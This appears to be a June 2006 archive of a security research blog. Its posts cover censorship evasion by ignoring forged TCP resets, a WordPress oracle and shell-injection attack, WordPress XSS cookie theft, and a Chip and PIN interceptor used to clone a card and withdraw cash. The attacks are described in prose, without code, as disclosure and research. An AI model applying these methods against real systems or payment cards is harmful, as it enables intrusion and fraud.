Monthly Archives: June 2006

Permissive action links for individual bullets

I read with interest about US Patent application 20060117632, which proposes to apply the notion of cryptographic accessory control to individual bullets in firearms. Only after an authentication protocol has convinced the tiny microprocessor in a cartridge that it is OK to potentially kill someone, it will close a transistor switch that normally blocks the electrical ignition mechanism.

It does not seem to me technically infeasible, or even cost prohibitive, to apply security mechanisms comparable to those we have come to expect to be used in weapons of mass destruction also to smaller weapon systems that were designed to kill only a few people at a time.

(The idea could be extended. If we add a chip to each cartridge, we might as well place it into the bullet itself. The bullet processor could then store in its NVRAM an audit log of the certification chain that ultimately authorized the firing of this bullet. With the right packaging, NVRAM chips can be made extremely tough and withstand hundreds of km/s² acceleration, much more than the conditions a normal bullet faces when penetrating a body. Having a log file in each bullet that identifies who is responsible for firing it could make the forensic investigation of shootings and war crimes so much easier.)

Ignoring the "Great Firewall of China"

The Great Firewall of China is an important tool for the Chinese Government in their efforts to censor the Internet. It works, in part, by inspecting web traffic to determine whether or not particular words are present. If the Chinese Government does not approve of one of the words in a web page (or a web request), perhaps it says “f” “a” “l” “u” “n”, then the connection is closed and the web page will be unavailable — it has been censored.

This user-level effect has been known for some time… but up until now, no-one seems to have looked more closely into what is actually happening (or when they have, they have misunderstood the packet level events).

It turns out [caveat: in the specific cases we’ve closely examined, YMMV] that the keyword detection is not actually being done in large routers on the borders of the Chinese networks, but in nearby subsidiary machines. When these machines detect the keyword, they do not actually prevent the packet containing the keyword from passing through the main router (this would be horribly complicated to achieve and still allow the router to run at the necessary speed). Instead, these subsiduary machines generate a series of TCP reset packets, which are sent to each end of the connection. When the resets arrive, the end-points assume they are genuine requests from the other end to close the connection — and obey. Hence the censorship occurs.

However, because the original packets are passed through the firewall unscathed, if both of the endpoints were to completely ignore the firewall’s reset packets, then the connection will proceed unhindered! We’ve done some real experiments on this — and it works just fine!! Think of it as the Harry Potter approach to the Great Firewall — just shut your eyes and walk onto Platform 9¾.

Ignoring resets is trivial to achieve by applying simple firewall rules… and has no significant effect on ordinary working. If you want to be a little more clever you can examine the hop count (TTL) in the reset packets and determine whether the values are consistent with them arriving from the far end, or if the value indicates they have come from the intervening censorship device. We would argue that there is much to commend examining TTL values when considering defences against denial-of-service attacks using reset packets. Having operating system vendors provide this new functionality as standard would also be of practical use because Chinese citizens would not need to run special firewall-busting code (which the authorities might attempt to outlaw) but just off-the-shelf software (which they would necessarily tolerate).

There’s a little more to this story (but not much) and all is revealed in our academic paper (Clayton, Murdoch, Watson) which will be presented at the 6th Workshop on Privacy Enhancing Technologies being held here in Cambridge this week.

NB: There’s also rather more to censorship in China than just the “Great Firewall” keyword detecting system — some sites are blocked unconditionally, and it is necessary to use other techniques, such as proxies, to deal with that. However, these static blocks are far more expensive for the Chinese Government to maintain, and are inherently more fragile and less adaptive to change as content moves around. So there remains real value in exposing the inadequacy of the generic system.

The bottom line though, is that a great deal of the effectiveness of the Great Chinese Firewall depends on systems agreeing that it should work … wasn’t there once a story about the Emperor’s New Clothes ?

Oracle attack on WordPress

This post describes the second of two vulnerabilities I found in WordPress. The first, a XSS vulnerability, was described last week. While the vulnerability discussed here is applicable in fewer cases than the previous one, it is an example of a comparatively rare class, oracle attacks, so I think merits further exposition.

An oracle attack is where an attacker can abuse a facility provided by a system to gain unauthorized access to protected information. The term originates from cryptology, and such attacks still crop up regularly; for example in banking security devices and protocols. The occurrence of an oracle attack in WordPress illustrates the need for a better understanding of cryptography, even by the authors of applications not conventionally considered to be cryptographic software. Also more forgiving primitives and better robustness principles could reduce the risk of future weaknesses.

The vulnerability is a variant of the ‘cache’ shell injection bug reported by rgodm. This is caused by an unfortunate series of design choices by the WordPress team, leading to arbitrary PHP execution. The WordPress cache stores commonly accessed information from the database, such as user profile data, in files for faster retrieval. Despite them being needed only by the server, they are still accessible from the web, which is commonly considered bad practice. To prevent the content being read remotely, the data is placed in .php files, commented out with //. Thus when executed by the web server, in response to a remote query, they return an empty file.

However, putting user controlled data in executable files is inherently a risky choice. If the attacker can escape from the comment then arbitrary PHP can be executed. rgodm’s shell injection bug does this by inserting a newline into the display name. Now all the attacker must do is guess the name of the .php file which stores his cached profile information, and invoke it to run the injected PHP. WordPress puts an index.php in the cache directory to suppress directory indexing, and filenames are generated as MD5(username || DB_PASSWORD) || “.php”, which creates hard to guess name. The original bug report suggested brute forcing DB_PASSWORD, the MySQL authentication password, but the oracle attack described here will succeed even if a strong password is chosen.

Continue reading Oracle attack on WordPress

Censoring science

I’ve written a rebuttal in today’s Guardian to an article that appeared last week by Martin Rees, the President of the Royal Society. Martin argued that science should be subjected to more surveillance and control in case terrorists do bad things with it.

Those of us who work with cryptography and computer security have been subjected to a lot of attempts by governments to restrict what we do and publish. It’s a long-running debate: the first book written on cryptology in English, by Bishop John Wilkins in 1641, remarked that ‘If all those useful Inventions that are liable to abuse, should therefore be concealed, there is not any Art or Science which might be lawfully profest’. (John, like Martin, was Master of Trinity in his day.)

In 2001–2, the government put an export control act through Parliament which, in its original form, would have required scientists working on subjects with possible military applications (that is, most subjects) to get export licenses before talking to foreigners about our work. FIPR colleagues and I opposed this; we organised Universities UK, the AUT, the Royal Society, the Conservatives and the Liberals to bring in an amendment in the Lords creating a research exemption for scientists. We mustn’t lose that. If scientists end up labouring under the same bureaucratic controls as companies that sell guns, then both science and nonproliferation will be seriously weakened.

Some people love to worry: Martin wrote a whole book wondering about how the human race will end. But maybe we should rather worry about something a bit closer to hand — how our civilisation will end. If a society turns inwards and builds walls to keep the barbarians out, then competition abates, momentum gets lost, confidence seeps away, and eventually the barbarians win. Imperial Rome, Ming Dynasty China, … ?

Anatomy of an XSS exploit

Last week I promised to follow up on a few XSS bugs that I found in WordPress. The vulnerabilities are fixed in WordPress 2.0.3, even though the release notes do not mention their existence. I think there are a number of useful lessons that can be drawn from them, so in this post I will describe some more details.

The goal of a classic XSS exploit is to run arbitrary Javascript, in the context of a another webpage, which retrieves the user’s cookies. With WordPress I will concentrate on the comment management interface. Here, the deletion button has a Javascript onclick event handler to display a confirmation dialog, which includes the comment author’s name. If malicious input can break out of the dialog box text, then when an administrator activates the button, the attacker’s Javascript is run, allowing access to the admin user’s cookies. I found two classes of bugs which allowed me to do this.

Continue reading Anatomy of an XSS exploit

Chip and skim 2

The 12:30 ITN news on ITV1 today featured a segment (video) on Chip and PIN, and should also be shown at 19:00 and 22:30. It included an interview with Ross Anderson and some shots of me presenting our Chip and PIN interceptor. The demonstration was similar to the one shown on German TV but this time we went all the way, borrowing a magstripe writer and producing a fake card. This was used by the reporter to successfully withdraw money from an ATM (from his own account).

More details on how the device actually works are on our interceptor page. The key vulnerabilities present in the UK Chip and PIN cards we have tested, which the interceptor relies on, are:

  • The entered PIN is sent from the terminal to the card in unencrypted form
  • It is still possible to use magstripe-only cards to withdraw cash, with the same PIN used in shops
  • All the details necessary to create a valid magstripe are also present on the chip

This means that a crook could insert a miniaturised version of the interceptor into the card slot of a Chip and PIN terminal, without interfering with the tamper detection. The details it collects include the PIN and enough information to create a valid magstripe. The fake card can now be used in ATMs which are willing to accept cards, which from its perspective, have a damaged chip — known as “fallback”. Some ATMs might even not be able to read the chip at all, particularly ones abroad.

The fact that the chip also includes the magstripe details is not strictly necessary, since a skimmer could also read this, but the design of some Chip and PIN terminals, which only cover the chip, make this difficult. One of the complaints against the terminals used in the Shell fraud was that they make it impossible to read the chip without reading the magstripe too. This led to suggestions that customers should not use such terminals, or even that they wipe their card’s magstripe to prevent skimmers from reading it.

While it is possible that the Shell fraudsters did read the magstripe, wiping it will not be a defence against them reading the communication between terminal and chip, which includes all the needed details. Even the CVV1, the code used to verify that a magstripe is valid, is on the chip (but not the CVV2, which is the 3 digit code printed on the back, used by ecommerce). This was presumably a backwards-compatibility measure, as was magstripe fallback. As shown by countless examples before, such features are frequently the source of security flaws.

The Rising Tide: DDoS by Defective Designs and Defaults

Dedicated readers will recall my article about how I tracked down the “DDoS” attack on stratum 1 time servers by various D-Link devices. I’ve now had a paper accepted at the 2nd Workshop on Steps to Reducing Unwanted Traffic on the Internet (SRUTI’06) which runs in California in early July.

The paper (PDF version available here and HTML here) gives rather more details about the problems with the D-Link firmware. More significantly, it puts this incident into context as one of a number of problems suffered by stratum 1 time servers over the past few years AND shows that these time server problems are just one example of a number of incidents involving different types of system that have been “attacked” by defective designs or poorly chosen defaults.

My paper is fairly gloomy about the prospects for improvement going forward. ISPs are unlikely to be interested in terminating customers who are running “reputable” systems which just happen to contribute to a DDoS on some remote system. There’s no evidence that system designers are learning from past mistakes — and the deskilling of program development is meaning that ever more clueless people are involved. Economic and legal approaches don’t seem especially promising — it may have cost D-Link (and Netgear before them) real dollars, but I doubt that the cost been high enough yet to scare other companies into auditing their systems before they too cause a similar problem.

As to the title… I suggest that if a classic, zombie-originated, DDoS attack is like directing a firehose onto a system; and if a “flash crowd” (or “slashdotting”) is like a flash flood; then the sort of “attack” that I describe is like a steadily rising tide, initially easy to ignore and not very significant, but it can still drown you just the same.

Hence it’s important to make sure that your security approach — be it dams and dikes, swimming costumes and life-jackets, or wetsuits and scuba gear (or of course their Internet anti-DDoS equivalents) — is suitable for dealing with all of these threats.